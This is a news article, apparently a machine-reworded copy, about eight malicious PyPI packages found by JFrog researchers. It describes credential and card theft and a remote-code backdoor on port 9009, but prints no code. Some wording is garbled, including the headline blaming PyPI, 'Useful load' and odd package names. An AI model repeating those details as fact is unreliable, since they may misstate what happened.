Software downloaded 30,000 times from developer machines looted by PyPI

Software downloaded 30,000 times from developer machines looted by PyPI

Open source packages downloaded approximately 30,000 times from PyPI’s open source repository contained malicious code that surreptitiously stole credit card data and login credentials and injected malicious code into infected machines, researchers said Thursday.

in a mailResearchers Andrey Polkovnichenko, Omer Kaspi and Shachar Menashe from security company JFrog said they recently found eight packages in PyPI that carried out a variety of malicious activities. Based on searches in, a site that provides Python package download statistics, researchers estimate that malicious packages were downloaded about 30,000 times.

Systemic threat

The discovery is the latest in a long line of attacks in recent years that abuse the responsiveness of open source repositories, which millions of software developers rely on every day. Despite their crucial role, repositories often lack robust security and investigative controls, a weakness that has the potential to cause serious supply chain attacks when developers inadvertently become infected or embed malicious code in software. that they publish.

“The ongoing discovery of malicious software packages in popular repositories like PyPI is an alarming trend that can lead to widespread supply chain attacks,” JFrog CTO Asaf Karas wrote in an email. “The ability of attackers to use simple stealth techniques to introduce malware means that developers must be concerned and vigilant. This is a systemic threat and must be actively addressed at multiple layers, both by maintainers of software repositories and by developers. “

The researchers thanked PyPI maintainer Dustin Ingram “for responding quickly and removing malicious packages” when notified. Ingram did not immediately respond to a request for comment.

The different packages on Thursday’s tour carried out different kinds of nefarious activities. Six of them had three payloads, one to collect authentication cookies for Discord accounts, a second to extract passwords or payment card data stored by browsers, and a third to collect information about the infected PC, such as IP addresses, computer name and username.

The remaining two packets had malware that tries to connect to an attacker-designated IP address on TCP port 9009 and then run whatever Python code is available on the socket. Now it is not known what the IP address was or if there was malware hosted on it.

Like most Python malware for beginners, the packages used only simple obfuscation, such as Base64 encoders. Here’s a breakdown of the packages:

Package name Maintainer Useful load
nobility xin1111 Discord token thief, credit card thief (Windows based)
genesisbot xin1111 Just like the nobility
are xin1111 Just like the nobility
suffer suffer Like the nobility, dazed by PyArmor
noblesse2 suffer Just like the nobility
noblessev2 suffer Just like the nobility
Pytagora leonora123 Remote code injection
pytagora2 leonora123 Same as pytagora

Karas told me that the first six packages had the ability to infect the developer’s computer, but could not contaminate the code that the developers wrote with malware.

“For the pytagora and pytagora2 packages, which allow code to run on the machine they were installed on, this would be possible.” he said in a direct message. “After infecting the development machine, they would allow code execution and then the attacker could download a payload that would modify the software projects under development. However, we have no evidence that this was actually done. “

Beware of ‘Frankenstein’ Malware Packages

Instead of spending days developing code that performs everyday tasks, programmers can turn to repositories such as PyPI, RubyGems, or npm for mature application packages that their peers have already developed. Among the 2.7 million packages available on PyPI, for example, are those that developers can use to build applications. Predicting the sale price of a house using data extracted from the Internet, send emails through Amazon ‘s Simple email service, or check open source code for vulnerabilities. PyPI provides packages for software written in Python, while RubyGems and npm provide packages for Ruby and JavaScript applications.

This crucial role makes repositories the ideal setting for supply chain attacks, which have become increasingly common through the use of techniques known as typosquatting or dependency confusion.

Attacks on the repository’s supply chain date back to at least 2016, when a college student uploaded malicious packages to PyPI. In a span of several months, his imposter code was executed more than 45,000 times on more than 17,000 separate domains, and more than half of the time his code was given all-powerful administrative rights. Since then, supply chain attacks have become commonplace for RubyGems and npm. In recent months, white hat hackers have prepared a new type of supply chain attack that works by uploading malicious packages to public code repositories and giving them a name that is identical to a package stored in a company’s internal repository. popular software. These so-called dependency confusion attacks have already caught Apple, Microsoft and 33 other companies.

The JFrog researchers said that based on the current state of repository security, the internet is likely to suffer more attacks in the future.

“Almost all of the code snippets analyzed in this investigation were based on known public tools, with only a few parameters changed,” they wrote. “Obfuscation was also based on public obfuscators. We expect to see more of these ‘Frankenstein’ malware packages combined from different attack tools (with modified exfiltration parameters). “

Leave a Reply

Your email address will not be published.